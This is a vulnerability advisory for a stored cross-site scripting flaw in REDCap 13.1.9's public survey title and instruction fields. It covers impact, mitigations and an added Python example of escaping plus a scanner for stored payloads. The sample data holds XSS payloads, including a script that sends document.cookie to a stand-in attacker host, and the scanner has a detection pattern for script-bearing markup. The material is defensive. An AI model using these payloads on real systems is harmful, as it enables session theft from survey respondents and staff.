
CVE-2024-37395: stored XSS in REDCap 13.1.9 public surveys (vendor and product are recorded as n/a in the CVE record)

Severity: High
Type: Vulnerability
Published: Tue Jun 10 2025 (06/10/2025, 00:00:00 UTC)
Source: CVE Database V5
Vendor/Project: n/a
Product: n/a

Description

A stored cross-site scripting (XSS) vulnerability in the Public Survey function of REDCap 13.1.9 allows authenticated users to execute arbitrary web script or HTML by injecting a crafted payload into the 'Survey Title' and 'Survey Instructions' fields. This vulnerability could be exploited by attackers to execute malicious scripts when the survey is accessed through its public link. It is advised to update to version 14.2.1 or later to fix this issue.

AI-Powered Analysis

Last updated: 07/10/2025, 20:02:10 UTC

Technical Analysis

CVE-2024-37395 is a stored cross-site scripting (XSS) vulnerability in the Public Survey function of REDCap (Research Electronic Data Capture) version 13.1.9. REDCap is a widely deployed web application for building and managing online surveys and research databases, used heavily in academic, clinical and research settings. The flaw is that an authenticated REDCap user with rights to edit a project's survey settings can place script or HTML in the 'Survey Title' and 'Survey Instructions' fields, and those stored values are later rendered without adequate sanitization or output encoding on the public survey page. Because that page is served from the REDCap site's own origin, the injected script runs with that origin's privileges in the browser of anyone who opens the public link: unauthenticated respondents, and any logged-in REDCap user or administrator who views the survey. The attacker therefore needs an account on the instance, but the CVE text does not indicate that administrative rights are required, and the payload persists server-side and fires on every visit until it is removed. Consequences include theft of session cookies or other credentials (where cookie attributes permit script access), actions performed in a victim's authenticated session, and delivery of further malicious content to respondents. The CVE record names REDCap 13.1.9 as affected and 14.2.1 or later as fixed; it does not state whether intermediate releases are affected. No CVSS score has been assigned and no exploitation in the wild was known at publication. Stored XSS in a public-facing survey tool that routinely handles sensitive personal and health data nonetheless represents a significant risk.

Potential Impact

For European organizations, especially those in healthcare, academic research and clinical trials where REDCap is commonly used, this vulnerability poses a substantial risk. Exploitation could expose sensitive personal and medical data, undermining confidentiality and potentially breaching GDPR obligations. An attacker could use the flaw to steal session cookies, act as a legitimate user inside the application, or serve malicious content to survey respondents, damaging organizational reputation and trust. Because REDCap surveys are typically distributed widely via public links, the population of potential victims is large and includes people outside the organization. Injected script can also change how the survey form behaves, for example altering or discarding responses before submission, which threatens data integrity; a script that breaks the page makes the survey unusable, a limited availability impact. Since REDCap projects are frequently shared across institutions, a compromised survey in one project can affect collaborative and multi-institutional studies common in Europe.

Mitigation Recommendations

To mitigate this vulnerability, organizations running REDCap should upgrade to version 14.2.1 or later, where the issue is fixed. The durable fix (output encoding, or allowlist sanitization where formatting markup in survey text is intentionally supported) lives in REDCap's own code, so operators cannot patch it themselves; upgrading is the control. Because the payload is stored, upgrading also does not remove anything already injected: administrators should review the 'Survey Title' and 'Survey Instructions' of existing projects for script tags, inline event handlers and javascript: URLs, and treat any hit as a potential compromise rather than a misconfiguration. A Content Security Policy that forbids inline scripts and restricts script-src to trusted hosts limits what an injected payload can do, but it must be tested against a staging instance first, since an application that relies on inline scripts will break under a strict policy. Restrict which accounts may create projects or edit survey settings, and review existing accounts, since the attacker needs authenticated access. Regular security audits and penetration tests focused on web application vulnerabilities help detect similar issues proactively. Review audit logs of changes to survey settings and web server logs for unusual activity on public survey endpoints for early detection of exploitation attempts, and remind users that survey links received by email may be malicious.
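The rendering flaw described in the technical analysis and the post-upgrade review recommended above are illustrated together in the following added example. This is example code written for this write-up, not REDCap's code: the HTML fragments, the column names `project_id`, `survey_title` and `survey_instructions`, and the sample rows are all constructed assumptions. It shows why interpolating a stored title verbatim executes attacker markup while HTML-entity encoding does not, and it scans exported survey metadata for active content (script-bearing elements, inline event handlers, script-scheme URLs) while deliberately leaving plain formatting tags alone, since survey instructions may legitimately contain them.

```python
"""Added example for the REDCap stored-XSS write-up (not REDCap's own code).

1. render_survey_header_unsafe / render_survey_header_safe contrast the
   vulnerable pattern (stored text dropped straight into HTML) with
   HTML-entity encoding for the element-body context.
2. find_active_markup is a triage scan over exported survey settings to
   locate payloads that may already be stored before or after upgrading.
"""
from __future__ import annotations

import html
import re
from typing import Iterable

# Constructed sample rows. The column names are assumptions for this
# example, not REDCap's real database schema.
SAMPLE_SURVEYS = [
    {"project_id": 101, "survey_title": "Patient Follow-up Q1",
     "survey_instructions": "Please answer all questions."},
    {"project_id": 102,
     "survey_title": 'Wellbeing <img src=x onerror="alert(document.cookie)">',
     "survey_instructions": "Thank you for participating."},
    {"project_id": 103, "survey_title": "Diet & Exercise Study",
     "survey_instructions":
         '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>'},
    {"project_id": 104, "survey_title": "Sleep <b>Quality</b> Survey",
     "survey_instructions": "Formatting tags like <b> are not flagged."},
]


def render_survey_header_unsafe(title: str, instructions: str) -> str:
    """Vulnerable pattern: stored values are interpolated verbatim, so any
    markup an authenticated editor saved becomes live HTML on the page."""
    return f"<h1>{title}</h1>\n<div class='instructions'>{instructions}</div>"


def render_survey_header_safe(title: str, instructions: str) -> str:
    """Hardened pattern: encode <, >, &, ' and " so the browser renders the
    stored text as text. (If formatting markup must be allowed, an
    allowlist sanitizer is needed instead of plain escaping.)"""
    return (f"<h1>{html.escape(title, quote=True)}</h1>\n"
            f"<div class='instructions'>{html.escape(instructions, quote=True)}</div>")


# Triage pattern for executable markup, not for all HTML:
#   - elements that carry or load script
#   - inline event handlers such as onerror= / onload=
#   - URL attributes using javascript:, data: or vbscript: schemes
ACTIVE_CONTENT = re.compile(
    r"<\s*(?:script|iframe|object|embed|svg|math)\b"
    r"|\son[a-z]+\s*="
    r"|(?:href|src|action|formaction)\s*=\s*['\"]?\s*(?:javascript|data|vbscript):",
    re.IGNORECASE,
)


def find_active_markup(
    rows: Iterable[dict],
    fields: tuple[str, ...] = ("survey_title", "survey_instructions"),
) -> list[tuple[int, str, str]]:
    """Return (project_id, field, matched snippet) for each stored value
    containing active content. Plain tags such as <b> are not reported."""
    hits = []
    for row in rows:
        for field in fields:
            match = ACTIVE_CONTENT.search(row.get(field) or "")
            if match:
                hits.append((row["project_id"], field, match.group(0)))
    return hits


if __name__ == "__main__":
    bad = SAMPLE_SURVEYS[1]
    print("UNSAFE:\n" + render_survey_header_unsafe(bad["survey_title"], bad["survey_instructions"]))
    print("SAFE:\n" + render_survey_header_safe(bad["survey_title"], bad["survey_instructions"]))
    for project_id, field, snippet in find_active_markup(SAMPLE_SURVEYS):
        print(f"project {project_id}: {field} contains {snippet!r}")
```

Run against a real export, the scan produces a short list of projects whose survey text needs a human look; matches like a bare `onerror=` or `<script` are almost never legitimate in a survey title, whereas a hit inside instructions that are meant to carry rich text should be compared against the project's change history before it is deleted.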


Technical Details

Data Version
5.1
Assigner Short Name
mitre
Date Reserved
2024-06-07T00:00:00.000Z
Cvss Version
null
State
PUBLISHED

Threat ID: 68487f501b0bd07c393899d0

Added to database: 6/10/2025, 6:54:08 PM

Last enriched: 7/10/2025, 8:02:10 PM

Last updated: 8/15/2025, 6:18:35 AM
